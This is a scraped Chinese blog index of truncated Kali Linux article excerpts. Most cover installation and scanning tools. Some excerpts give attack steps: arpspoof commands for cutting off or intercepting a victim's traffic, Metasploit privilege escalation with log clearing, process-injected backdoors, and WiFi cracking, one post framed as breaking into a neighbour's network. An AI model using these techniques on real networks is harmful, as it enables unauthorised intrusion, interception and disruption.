数据库
servlet
基础学习
串口
ajax
spring cloud
kmeans
NPDP认证
HuggingFace
vue3
makefile
cve分析与复现
视频
图片提取软件
Conditional注解
六旋翼无人机
机器人原理
洛谷
文献解读
蜂巢
kali
2024/4/11 16:38:44
kali安装AWVS 13.X
一次安装awvs的小记录,避免以后忘记!!!
1、手动记录遇到的坑
【1】User acunetix already exist. Home directory for user acunetix not found.经过百度一番,反复修改,终于发现是之前我安装了一个awvs12…
kali linux解决a start job is running for dev-disk-by启动错误
安装kali开机之后发现显示了a start job is running for dev-disk-by的报错,而且得多等1分30秒。这带来了巨大麻烦。其实解决方法很简单。 首先出现这个错误的原因是交换分区(swap分区)未成功挂载,且目前未成功挂载交换分区有两种…
kali查看杀死端口
lsof lsof(list open files)是一个列出当前系统打开文件的工具。 lsof 查看端口占用语法格式: lsof -i:端口号
实例 查看服务器 8000 端口的占用情况:
lsof -i:8000
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME nodejs 26993 root 10u IPv4 …
【kali】使用VMware安装kali
目录
2、解压
3、安装
3.1 然后打开vm虚拟机,在文件菜单中选择打开 3.2 找到已解压的文件,选择一下文件
4、开启虚拟机,进入系统 1、下载
Get Kali | Kali Linux 我使用的是VMware12,所有下载下图 2、解压 3、安装
3.1 然后…
kali 如何下载文件
使用实例 实例1:使用wget下载单个文件 $wget http://www.minjieren.com/wordpress-3.1-zh_CN.zip 说明:以上例子从网络下载一个文件并保存在当前目录,在下载的过程中会显示进度条,包含(下载完成百分比,已经…
msf 提权和清除日志
0x00:介绍
在获取目标系统 shell 后,如果遇到了普通的 user 账户,则在后渗透阶段会有一些局限性,例如获取 hash,修改注册表,装软件等,所以会涉及到接下来的提权操作,由 guest 到 us…
kali xss漏洞扫描工具使用教程
xss漏洞扫描教程
git clone https://github.com/hahwul/XSpear.git
cd XSpear/
ls
gem
sudo gem install XSpear-1.4.1.gem (往后版本可能会更新,根据文件夹里的版本进行下载)
XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat123”…
kali 最详细wifi抓包教程
工具: 1:笔记本 2:USB无线网卡(必备) 3:kali系统 4:靠谱字典 第一种方法: 暴力破解法 何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。 现在的w…
kali如何切换python脚本
有时候使用kali时,我们可能需要切换不同的python环境,kali切换python环境可以通过命令update-alternatives,update为更新的意思,alternatives为备选方案的意思,从字面理解这个命令就是用来切换方案的,也就是…
kali 安装 netspeed 扩展
netspeed 扩展可以在桌面顶部那栏实时的显示流量,和手机实时显示网速一样,这个扩展还是很不错的。
首先,kali 需要可以访问 google,否则无法下载这个扩展(可以参考之前的 kali 配置 ssh 文章)。
命令行使…
端口扫描 - Scapy
0x00:简介
scapy 除了之前在二层三层四层做发现外,也可以用来扫描端口。
0x01:scapy udp 端口扫描
先说一下 scapy 根据 udp 来发现端口的原理,首先,要扫描端口的主机是在线的,可以通过之前各层的发现技…
empire用法笔记
0x00:简介
empire 是一个针对内网针对域控的一个渗透测试框架,和 msf 类似。其中集成了很多内网的一些工具以及命令,使用方便,且 empire 生成的木马文件基于 powershell,所以在 windows 平台上有很好的免杀效果。结合…
kali fping工具详细教程
fping
-a Lists targets that responded 显示可ping通的目标
-A Lists targets by address instead of hostname 将目标以ip地址的形式显示
-b Sends bytes of data per ICMP packet (default 56) ping 数据包的大小。(默认为56)
-B Tells fping t…
metasploit 简介
0x00:简介
metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可。
metasploit 会经常更新其中的一些模块…
kali 2023.3新增工具
在终端模拟器中运行 sudo apt update && sudo apt full-upgrade 命令来更新其安装
Kali Linux 2023.3 发布中包含了九个新工具,分别是: Calico:云原生网络和网络安全。 cri-tools:用于Kubelet容器运行时接口的命令行界面…
linux 系统使用 cymothoa 添加后门
0x00:介绍
cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的…
5分钟完成 Kali linux安装(基于VirtualBox)
1. 背景 如果你想在一台windows机器上安装kali,用于渗透扫描,那么这篇文章不要错过。方法简单快速。
2. 软件准备
下载virtualbox
Downloads – Oracle VM VirtualBox
下载专门用于virtualbox的kali镜像
Get Kali | Kali Linux
3. virtualbox安装 …
信息搜集 - 三层发现 fping
0x00:简介
fping 命令和 ping 类似,主要区别在于 ping 不支持网段扫描,需要结合 shell 写脚本。而 fping 支持。这里把 fping 放到了三层发现,其主要使用协议还是 icmp。
0x01:fping
首先,最基本的用法和…
封神台 kali sqlmap 注入常见问题
sqlmap使用前,测试网页是否存在可注入漏洞:
1.寻找形如“.asp?idxx”类的带参数的URL。
2.去掉“idxx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。
3.清空浏览器地址栏,输入“javascr…
【kali后续配置】Kali Linux 换源更新及配置SSH服务一文通(一键换源脚本)
在前面,我们已经下载并安装了Kali Linux 2023版本,因为一些事情的耽误,后面的一些操作教程没有发出来,今天给大家补上。
Kali Linux安装
前置准备:
VMware安装kali Linux 镜像下载
kali源
官方源
deb http://htt…
【Kali】vmware虚拟机三种网络连接方式,ms17-010 , ms08_067的复现
【Kali】vmware虚拟机三种网络连接方式,ms17-010 , ms08_067的复现 nmapmsfconsolevmware虚拟机三种网络连接方式ms17-010ms08_067 kali中对windowsXP、windows 7漏洞利用使用到的工具:nmap、msfconsole。 nmap
nmap是一个网络连接端扫描软件…
foremost命令参数中文说明
Foremost是基于文件开始格式,文件结束标志和内部数据结构进行恢复文件的程序。
foremost命令参数英文英文说明:
$ foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>] [-b <size>] [-c <file&…
Kali Linux虚拟机配置ssh连接shell
Kali Linux虚拟机配置ssh连接shell
1修改/etc/ssh/sshd_config的文件配置
vim /etc/ssh/sshd_config找到#PasswordAunthentication yes吧#的注释去掉 按 i 进入插入操作模式 插入一行PermitRootLogin yes 保存退出 Esc shift: wq 2 开启ssh服务
systemctl start ssh
system…
kali查看进程PS
PS工具
ps工具标识进程的5种状态码: D 不可中断 uninterruptible sleep (usually IO) R 运行 runnable (on run queue) S 中断 sleeping T 停止 traced or stopped Z 僵死 a defunct (”zombie”) process
4.1. 命令参数 a 显示所有进程 -a 显示同一终端下的所有程序 -A 显示…
红队打靶:ConnectTheDots打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现和端口扫描
第二步:FTP和NFS渗透(失败)
第三步:web渗透
第四步:jsfuck解码
第五步:再次FTP渗透与莫尔斯电码解码
第六步:vim读取断电swp文件…
信息搜集 - 二层发现 Scapy
0x00:简介
scapy 是一个很强大的库文件,是 python 为了操作网络流量而写的一个库。它可以抓包分析包以及创建修改等很多强大的功能,这篇记录 scapy 怎么去做二层发现,这个工具在后面几层也会用到。
0x01:scapy 使用 …
kali netstat使用教程
netstat
-a (all)显示所有选项,默认不显示LISTEN相关 -t (tcp)仅显示tcp相关选项 -u (udp)仅显示udp相关选项 -n 拒绝显示别名,能显示数字的全部转化成数字。 -l 仅列出有在 Listen (监听) 的服務状态
-p 显示建立相关链接的程序名 -r 显示路由信息&am…
Vulnhub内网渗透DC-7靶场通关
个人博客: xzajyjs.cn DC系列共9个靶场,本次来试玩一下一个 DC-7,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不…
信息搜集-nslookup
0x00:前言
被动信息搜集中,可以使用nslookup工具来搜集目标的ip以及各种解析记录,这个命令在win和linux中都是自带的,可以直接使用。
0x01:常见的记录
a记录:将域名解析为ipv4地址。 cname记录ÿ…
kali web网站扫描
步骤 扫描映射web信息 cewl www.xxx.com
扫描网站服务器信息(对http协议可用) whatweb www.xxx.com
根据上面扫描的IP地址进行漏洞扫描,扫描开放的端口 nmap xxx.xxx.xxx.xxx -v
信息搜集 - 四层发现 Nmap
0x00:简介
四层发现主要利用 tcp 和 udp,而除了 scapy 外,nmap 无疑也是一个很强大的工具。
0x01:nmap 四层发现
首先,来看一下主要用到的参数,如下图: 红框中的参数分别是 PS、PA、PU、PY&a…
如何利用僵尸扫描来发现服务器的开放端口
0x00:简介
渗透测试信息搜集阶段,在发现目标服务器所开放端口时,扫描方式可分为三种,分别是:隐蔽扫描,全链接扫描和僵尸扫描。
全链接扫描:即正常的请求,过程包含了三次握手&#…
信息搜集 - DNS
0x00:前言
在搜集域名相关的信息时,除了使用上一篇记录的 nslookup 命令外,dig 也是经常用的一个工具比 nslookup 更强大。
0x01:dig
dig 也是用来查询域名的相关信息的,和 nslookup 相似,但更强大&…
Vulnhub系列靶机---HarryPotter-Fawkes-哈利波特系列靶机-3
文章目录 信息收集主机发现端口扫描dirsearch扫描gobuster扫描 漏洞利用缓冲区溢出edb-debugger工具msf-pattern工具 docker容器内提权tcpdump流量分析容器外- sudo漏洞提权 靶机文档:HarryPotter: Fawkes 下载地址:Download (Mirror) 难易程度ÿ…
kali Nmap命令详细教程
Nmap 命令参数解析 扫描之前先来看一下参数解析.
-sT TCP connect() 扫描,这是最基本的 TCP 扫描方式。这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。 -sS TCP 同步扫描 (TCP SYN),因为不必全部打开一个 TC…
kali里lamp环境搭建、docker安装
LAMP环境搭建docker安装kali安装教程:https://www.cnblogs.com/liangmingshen/p/12173769.html
由于重新安装虚拟机,所以很多环境都要重装,之前每次都百度,干脆这次自己也记一下好了。
LAMP环境搭建
L:系统…
渗透测试被动信息搜集之 Recon-NG
0x00:前言
在渗透测试中,第一步莫非搜集信息,而搜集信息其被动搜索方法是很不错的。为什么?对于搜集信息被主机检测到的可能性来说,被动搜索是最低的,其次是主机检测、端口扫描等,然后就是主机…
保姆级最新版Kali虚拟机安装和汉化中文教程
Kali虚拟机简介 Kali虚拟机是一款基于Debian的Linux发行版虚拟机操作系统,专为安全渗透测试和数字取证而设计。该虚拟机预装了许多渗透测试软件,包括Metasploit、BurpSuite、sqlmap、nmap以及Cobalt Strike等,这些工具都是为了进行网络安全测…
kali2020下net-tools不能使用,ifconfig/reboot等命令不能直接使用
本人在安装kaili2020后,先是运行ifconfig、service等命令发现未找到 于是一波百度,看到有人说是因为没有安装net-tools工具导致,于是安装 换源各种操作 各种解决报错,后来发现还是不能运行啊。
最后在贴吧里有人这样说 抱着侥幸…
信息搜集 - 二层发现 arping
0x00:简介
在被动信息搜集工作完成后,需要在进一步的对目标进行主动信息搜集,这一阶段主要搜索的信息包括目标主机是否存活,上面开放了哪些端口,有哪些服务,服务系统是什么,开发服务的版本以及…
信息搜集 - 三层发现 hping3
0x00:简介
hping 也是一个很强大的发包程序,最新版本是 3,hping 除了可以发送各种各样的数据包外,还可以做压力测试,造成一定程度的拒绝服务攻击。
0x01:hping3
hping3 在三层发现目标的基本用法和 ping…
信息搜集 - 四层发现 hping3
0x00:简介
hping3 之前在三层发现有记录,格式是 hping3 1.1.1.1 --icmp -c 1,利用的主要是三层协议 icmp。而在四层中,格式类似,区别在于指定的协议不同。
0x01:hping3 udp
hping3 四层发现主要使用的协…
看我如何破解隔壁家小姐姐的wifi
看我如何破解隔壁家小姐姐的wifi
“孟婆,再来一碗”
“小伙,你已经喝了好几碗了!”
“可她还在”最简单的社会工程学,比如说是某某运营商测试人员,为了后续提高网速,等等等,连哄带骗,软磨硬泡&…
端口扫描 - Scapy - 隐蔽扫描
0x00:简介
端口扫描可分为三种,分别是隐蔽扫描、全链接扫描、僵尸扫描。
隐蔽扫描:像服务器发起的请求不会经历完整的三次握手,首先会向目标服务器进行第一次握手,发送一个 SYN 包,然后根据服务器返回的 …
meterpreter 简单应用
0x00:介绍
使用 metasploit 渗透下一台主机后,并不意味着渗透测试的结束,而接下来需要做的就是后渗透阶段,后渗透阶段在已经拿下目标主机的前提下,进行一系列获取敏感信息、利用这台机器为跳板机做其他主机的攻击等&a…
Kali Linux安装完成后所有中文显示方块问题修复(xfce桌面)
最新版本的kali(2019.4)把桌面换成了xfce,但是很多人会发现刚刚安装之后会有中文无法显示的情况: 其实解决这个问题很简单,我们只需要向系统字体文件夹复制字体即可。
打开文件管理器,进入路径/usr/local/…
信息搜集 - 三层发现 Nmap
0x00:简介
nmap 在之前二层发现目标主要是通过 sn 参数,而三层发现的参数也是 sn,namp 通过 sn 参数进行扫描目标,作用于哪层要根据扫描的范围来定。
当扫描的目标和自己在同一个网段的时候,sn 参数主要就是用的 arp…
kali cewl网站映射工具
cewl
当你要爆破一个网站的登陆页面,可以使用CeWL来映射网站,也就是可以爬取网站上的关键词或类似词的有用信息,来做成字典。简单使用方法如下
cewl www.baidu.com -w baidu.txt
ls
cat baidu.txt
kali字典暴力破解教程
cd /home/etc
cat passwd 下面会展示各种信息,账号密码(加密处理过的)
adduser adcomgming (新建一个管理账号,dacongming)根据提示填入账号密码用户名个人信息等 继续y
cd /home 回到家目录下
ls 查看,…
kali fping工具,扫描网络存活主机
fping扫描网络存活主机,并保存为文件: rootkali:~# fping -g 192.168.50.0/24 -a -q > activeHost rootkali:~# cat activeHost 192.168.50.1 192.168.50.2 192.168.50.128
端口扫描:
扫描192.168.0.3这台主机开放了哪些端口;…
更新到最新版kali 2019.4,伪装成win10渗透神器
上周kali更新到了2019.4听说加了很多新功能。最吸引我的是可以伪装成win10的主题,非常阴吹思婷。可以直接从官网下载最新版的镜像安装,也可以直接更新。我这里把我kali 2019.1 rolling版更新到最新版尝尝鲜。更新完总体的感觉,是更吃资源了&a…
UDP 端口扫描 - Nmap
0x00:简介
nmap 在二层做主机发现时使用的参数是 sn(ping 扫描,不做端口扫描)。在三层做主机发现时也是使用的 sn 参数,这里二三层都用的 sn 参数,而具体使用的是二层协议 arp 还是三层协议 icmpÿ…
【Linux】Kali Linux 系统安装详细教程(虚拟机)
目录
1.1 Kali linux简介
1.2 Kali Linux工具
1.3 VMware workstation和ESXi的区别
二、安装步骤 一、Kali概述 1.1 Kali linux简介 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最…
kali设置静态ip地址
Kali设置静态ip地址
本篇文章主要分3部分讲解如何为Kali虚拟机配置静态IP地址,使其能够与主机和外网进行通信。首先需要配置VMware的虚拟网卡,然后配置Kali虚拟机,最后配置主机。
一、配置VMware 打开VMware,选择【编辑】—【虚…
绕过锁定的Windows计算机从Live USB运行Kali Linux
绕过锁定的计算机从Live USB运行Kali Linux
在几乎任何可用的计算机上都可以通过USB轻松运行Kali Linux ,但许多可公开访问的笔记本电脑和台式机为了防止此类使用都会被锁定。 通过USB在计算机上运行Kali Linux
使用Kali live USB,就可以在任何可以插入…
Kali-linux Gerix Wifi Cracker破解无线网络
Gerix Wifi Cracker是另一个aircrack图形用户界面的无线网络破解工具。本节将介绍使用该工具破解无线网络及创建假的接入点。
9.3.1 Gerix破解WEP加密的无线网络
在前面介绍了手动使用Aircrack-ng破解WEP和WPA/WPA2加密的无线网络。为了方便,本小节将介绍使用Geri…
Windows漏洞利用开发——利用SEH绕过GS保护
实验6 Windows漏洞利用开发
6.1实验名称
Windows漏洞利用开发 6.2实验目的
学习windows漏洞利用开发,使用kali linux相关工具对windows内目标程序进行漏洞利用 6.3实验步骤及内容
第二阶段:利用SEH绕过GS保护
了解GS编译选项,SHE异常处…
kali commix工具使用详细教程
COMMIX 简介 commix 是一款由 python 编写,开源自动化检测系统命令注入工具 下载地址如下 github.com/commixproject/commix
参数 选项: -v VERBOSE详细程度级别(0-1,默认值:0)。 –v…
kali 移动文件命令
用法 mv [选项]… [-T] 源文件 目标文件 或:mv [选项]… 源文件… 目录 或:mv [选项]… -t 目录 源文件…
将<源文件>重命名为<目标文件>,或将<源文件>移动至指定<目录>。
必选参数对长短选项同时适用。 –backup[…
Linux kali 工具命令大全
whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 扫描 nmap: -sS 半开扫描TCP和SYN扫描。 -sT 完全TCP连接扫描。 -sU UDP扫描 -PS syn包探测(防火墙探测) -PA ack包探…
解决 Debian/Kali 环境安装Qt报错 SSL
问题描述
rootblueboz:~/Downloads# ./qt-opensource-linux-x64-5.5.0-2.run
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_num_locks
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_id_callback
qt.network.ssl: QSslSocket: cannot resolve CRYPTO_set_lo…
Linux kali虚拟机与Windows共享,基于smb(可互传文件)
简介
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。
用于局域网分享网络文件用,也可以打印。
samba 是基于SMB协议(ServerMessage Block,信息服务块)的开源软件…
Kali Linux配置apt-get 源为官方源
Kali Linux配置apt-get 源为官方源
rootkali:~# vim /etc/apt/sources.list最好用官方源 其他博主没有尝试
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib#中科大
deb ht…
信息搜集 - 三层发现 Scapy
0x00:简介
之前的二层发现利用 arp 协议记录了 scapy 的使用方法,主要通过 ARP() 函数进行的发现。在三层中 scapy 也可以用来发现目标,利用的协议也是三层的主要协议 ip 和 icmp,方法类似。
0x01:scapy 三层发现
s…
信息搜集 - 二层发现 Netdiscover
0x00:简介
netdiscover 也是一款扫描工具,或者说是一个命令也可以,kali 自带可以通过应用程序 - 信息搜集栏打开,也可以直接在命令行执行相关扫描。参数用法可以通过 - h 查看。 netdiscover 是用来在二层去发现其他主机的&#…
信息搜集 - 二层发现 Nmap
0x00:简介
Nmap 很强大,也可以用来在二层的时候去发现其他机器。使用参数用到了两个,一个是 sn,作用是进行 ping 扫描。另一个是 iL,作用是从文件中读取目标地址进行扫描。和上一篇的 arping 记录的两个 shell 脚本作…
红队打靶:Misdirection打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现与端口扫描
第二步:Web渗透(80端口,战术放弃)
第三步:Web渗透(8080端口)
第四步:sudo bash提权
第五步:/etc/passwd利…
【精选】中间件 tomcat漏洞复现
🍬 博主介绍👨🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏…
kali基础渗透学习,永恒之蓝,木马实战
简介
kali的学习本质是在linux上对一些攻击软件的使用,只是学习的初期
先在终端切换到root用户,以便于有些工具对权限的要求
下载链接
镜像源kali
攻击流程
公网信息搜集
寻找漏洞,突破口,以进入内网
进入内网,…
kali2020出现中文乱码解决
中文乱码效果 解决: 1.分别输入以下命令
sudo vim /etc/apt/sources.list
#换源-浙大源
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
sudo apt-get insta…
红队打靶:Narak打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现与端口扫描
第二步:Web渗透
第三步:tftp渗透
第四步:webdav利用
第五步:寻找敏感文件初步提权
第六步:motd利用提权
总结与思考
写在开头 本篇博客在自己的理解之上…
信息搜集 - GoogleHack
0x00:简介
在渗透测试的信息搜集阶段,利用搜索引擎去搜索一些信息也是必不可少的,除了上一篇记录的 shodan 外,googlehack 也是很多人使用的一种方法,利用 google 搜索信息进行信息搜集的工作。
0x01:基本…
信息搜集 - Maltego
0x00:简介
Maltego 是一个信息搜集工具,kali 自带,可以在 kali 中直接使用。之前记录的目标域名信息搜集 nslookup、dig、whios、googlehack、shodan 这些都可以通过 maltego 来实现。通过图形界面直接使用点击按钮就可以进行系列操作&#…
Kali-linux枚举服务
枚举是一类程序,它允许用户从一个网络中收集某一类的所有相关信息。本节将介绍DNS枚举和SNMP枚举技术。DNS枚举可以收集本地所有DNS服务和相关条目。DNS枚举可以帮助用户收集目标组织的关键信息,如用户名、计算机名和IP地址等,为了获取这些信…
端口扫描 - Nmap - 隐蔽扫描
0x00:简介
除了使用 scapy 的 tcp 包根据返回了 flags 来判断端口是否开放外,nmap 也可以去做端口扫描,隐蔽扫描主要用到的参数是 sS,如果不加 sS 参数,nmap 默认也会使用 tcp 去发 SYN 来根据返回的结果做判断。nmap…
本机putty无法连接到虚拟机中kali操作系统
sudo apt-get install -y openssh-server安装一下软件,我这里已经安装好了,所以没有安装过程了。
firewall-cmd --zonepublic --remove-port22/tcp --permanent想要打开22端口,发现报错如下:
Could not find command-not-found…
Kali常用配置(持续更新)
1. 同步系统时间
命令:dpkg-reconfigure tzdata ,这个命令可以同时更新系统时间和硬件时间。 然后选择区域和城市,中国可以先选择Asia,然后选择Shanghai
2.更换系统数据源
# vim /etc/apt/sources.list #不是root用户的话需要…
端口扫描 - hping3 - 隐蔽扫描
0x00:简介
hping3 通过 syn 包来进行端口扫描,设计的参数有:--scan 和 - S,scan 代表开始扫描模式,S 代表 syn 包检测。
0x01:hping3 syn
hping3 端口书写格式和 nmap 几乎一样,首先是单个端…
端口扫描 - scapy - 全链接扫描
0x00:介绍
端口扫描分为隐蔽扫描、全链接扫描、僵尸扫描。
全链接扫描:隐蔽扫描是直接发的 syn 包,只进行第一次握手,通过返回的信息判断端口是否开放。全链接扫描顾名思义,像正常的请求一样去访问目标服务器&#x…
Linux学习笔记-关于KALI的默认账号密码
KALI默认账号密码
关于kali当中的默认账号和密码 1笔者这里使用的是2020之前的版本,默认的账号密码是 账号:root 密码:toor
2但是在2020之后的版本当中改变安全策略,账号密码转变为 账号:kali 密码:kal…
Kali Linux2021.2发布,增加大量新工具和功能
Offensive Security今天发布了Kali Linux 2021.2,新版本增加了新工具和新主题和功能,例如访问特权端口和基于控制台的配置实用程序。 Kali Linux是一个Linux发行版,专为网络安全专业人员和白帽黑客设计,以执行渗透测试和安全审计。
Kali Linux2021.2的新增工具和实用程序如…
详细的Kali Linux安装
详细的Kali安装
百度网盘 镜像 链接:https://pan.baidu.com/s/1flcseVvaq_zdYLqAwSB1Bw 提取码:1b2p
创建VMware虚拟机 1 2
3
4
5
6
7
8
9
10
11
12
13
14
选择Graphical install
选择语言选择中文简体,区域选择中国。 中…
pymysql连接Mariadb/Mysql出现错误(配置正确情况下)解决办法
场景:在kali中使用python中pymysql对Mariadb进行连接,在整个过程中配置全部正确,但是就是无法进行连接,提示结果如下:
Access denied for user rootlocalhost解决办法:进入数据库中,将默认密码…
红队打靶:Nyx: 1打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现和端口扫描
第二步:ssh私钥登录获取初始立足点
第三步:sudo gcc提权
番外篇:如何掉进web渗透的陷阱无法自拔
总结与思考
写在开头 我个人的打靶顺序是根据红队笔记大佬的视频顺序࿰…
细谈永恒之蓝,实现复现
永恒之蓝
定义: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日…
黑客学习_从入门到精通-02.nmap端口查找
nmap
nmap扫描可以查看一个ip的资产(资源,例如:域名,旁名等),用法很简单,我们先打开我们的kali linux虚拟机,用 su - 拿到root用户权限,然后找一个网站,复制…
kali骚操作之基本配置
目录前言kali的下载kali的安装kali之软件基础操作更新源软件安装软件卸载安装vm-tools安装中文输入法安装netspeed安装goldendict翻译软件安装google浏览器前言
kali是个强大且牛皮的系统,里面有很多的渗透小公举可供大家玩赏,那么第一次安装的新的kali…
将Kali Linux中的Firefox浏览器语言设置为中文
kali中的Firefox浏览器默认为英文,为了方便还是改为中文。 1、打开终端,输入 apt -y install firefox-esr-l10n-zh-cn ,回车 (下载安装语言包)
apt -y install firefox-esr-l10n-zh-cnapt --fix-broken install打开火…
kali系列-nmap 简化步骤操作(带图)
标题 准备环境 1.kali 2. 靶机 (win7)
1.nmap -sV 192.168.44.130 //* 扫描版本号*// nmap -O 192.168.44.130 2.nmap - T 4 -A 192.168 //* 最重要的命令 可以扫版本号 ,端口信息 懒人专用 3. nmap 192.168.44.130 谈诺出现这样的情况 把…
kali安装中文搜狗输入法
我们在使用大多数linux系统时,有些不提供中文输入法,这就导致我们在使用时存在一些困难,毕竟刚接触linux系统,还是图形界面,对我们这些初学Linux的人来说有许多?那么我们要坚持一个不懂就学懂好习惯&#x…
2021最新kali安装中文输入法
2021最新kali安装中文输入法 1.打开kali命令终端2.安装输入法框架fcitx3.安装输入法4.配置google拼音输入法1.打开kali命令终端 2.安装输入法框架fcitx 1.输入sudo apt install fcitx</
Mac安装Kali保姆级教程
Mac安装Kali保姆级教程 其他安装教程:使用VMware安装系统Window、Linux(kali)、Mac操作系统 1 虚拟机安装VM Fusion
去官网下载VM Fusion
地址:https://customerconnect.vmware.com/en/evalcenter?pfusion-player-personal-13 …
Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出
Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出 程序漏洞从哪里来? 罪恶的根源:变量数据与代码边界不清(注入攻击)最简漏洞原理-shell 脚本漏洞(本质:输入数据本身,程序本身没做检查导致) 缓冲区溢出 当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓…
走进黑客漏洞赏金猎人的大门:SSRF漏洞漏洞挖掘
走进黑客漏洞赏金猎人的大门:SSRF漏洞漏洞挖掘。 开始:作者首先进行了侦查,发现应用程序使用的是运行Apache Web服务器的Ubuntu Linux。他打开网站,观察到应用程序中有一个URL字段。 尝试各种攻击:作者尝试了可能的LFI(本地文件包含)有效载荷,但没有成功。然后他尝试了…
kali arp欺骗
关闭IP转发:echo 0 > /proc/sys/net/ipv4/ip_forward,用于断网攻击。
开启IP转发:echo 1 > /proc/sys/net/ipv4/ip_forward,用于截取数据。
arpspoof -i 网卡 -t 靶机IP 网关
例:arpspoof -i eth0 -t 192.168…
Linux下添加桌面快捷方式
最近使用了一下Linux系统,发现许多应用下载下来是压缩包,虽然解压后打开主程序即可使用,但没有快捷方式还是很不方便。与Windows不同,Linux添加快捷方式没那么简单。下面以Kali Linux为例演示。
1,打开任何一个文本编…
VM16Pro的Win10虚拟机安装Linux子系统Kali
VM16Pro的Win10虚拟机安装Linux子系统Kali 一、启用Windows功能二、配置WSL三、安装Kali四、安装kali基本工具包五、图形化六、适用的报错七、其他问题参考 一、启用Windows功能
启用后需重启二、配置WSL
wsl --update #管理员启动Powershell执行,完成后将下面…
Kali入门指南:完美安装与配置教程
Kali Linux 具有许多预安装的工具,对于安全专业人员、道德黑客和网络安全研究人员至关重要。它具有用户友好的界面,即使对于初学者也很容易使用。该操作系统可以高度定制,以满足用户的需求。它也与各种硬件兼容,使它成为桌面、笔记…
【proxychains4】虚拟机内kali走主机代理
文章目录 简介安装配置使用测试 简介
ProxyChains是Linux和其他Unix下的代理工具。 它可以使任何程序通过代理上网, 允许TCP和DNS通过代理隧道, 支持HTTP、 SOCKS4和SOCKS5类型的代理服务器, 并且可配置多个代理。 ProxyChains通过一个用户定…
kali安装novnc
00### 安装tightvncserver
# 安装tightvncserver
apt install tightvncserver -y# 配置访问密码
vncpasswd# 启动vncserver, :1 端口号1 即59001 5901
vncserver :1# 测试vnc是否可连接, 必须成功登陆一次否则novnc登陆会出现白屏
vncviewer localhost…
kali的下载与安装(VM虚拟机)
目录
一、介绍
二、下载安装
(一)官网下载kali
(二)官网下载VM虚拟机
(三)安装VM虚拟机
(三)VM虚拟机里面安装kali系统 一、介绍 (1)Kali Linux是一种基…
kali2021安装GVM(openVAS)
openVAS从10版本后改名GVM,这里用的kali系统也是2020年的最新系统 安装之前将kali的源换成国内的源,像阿里源或中科大源。位置/etc/apt/sources.list。
命令:
vim /etc/apt/sources.list#阿里云
deb http://mirrors.aliyun.com/kali kali…
利用metasploit生成反弹shell程序,实现远程控制
1. 关于metasploit Metasploit是一款开源的渗透测试框架,由Rapid7公司开发和维护。它提供了一套强大的工具和资源,用于评估和测试计算机系统的安全性。Metasploit的目标是帮助安全专业人员发现和利用系统中的漏洞,以便改进系统的安全性。 Met…
MacOS环境下Kali Linux安装及使用指导
Kali Linux是一个开源的、基于Debian的Linux发行版,面向各种信息安全任务,如渗透测试、安全研究、计算机取证和逆向工程,是最先进的渗透测试发行版,它的前身是BackTrack。 1. 我们为什么要用Kali Linux
由于Kali Linux具有以下特…
Kali linux aprspoof arp断网、欺骗攻击
环境
攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 网关:172.16.252.2
安装arpspoof
Kali Linux 2020.1 VM版本身没有arpspoof工具,需要自己安装。arpspoof是dsniff的一个组件,直接安…
1.1 Kali初始化
下载Kali
下载文件:Kali Linux 32 Bit(根据自己的需求)
下载方式:HTTP
下载地址(如下):
https://www.kali.org/downloads/下载虚拟机
#如果不行就得先注册!
下载网址࿱…
Kali-linux密码在线破解
为了使用户能成功登录到目标系统,所以需要获取一个正确的密码。在Kali中,在线破解密码的工具很多,其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解。
8.1.1 Hydra工具
Hydra是一个相当强大的暴力密…
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕 声明:本篇仅仅是将本机作为靶机的一次简易渗透测试,实际情况中基本不可能出现如此简单的木马骇入(往往在上传木马时就被防…
红队打靶:THE PLANETS: MERCURY打靶思路详解(vulnhub)
目录
写在开头
第一步:主机发现和端口扫描
第二步:Web渗透
第三步:获取初步立足点并搜集信息
第四步:软连接劫持sudo提权
总结与思考
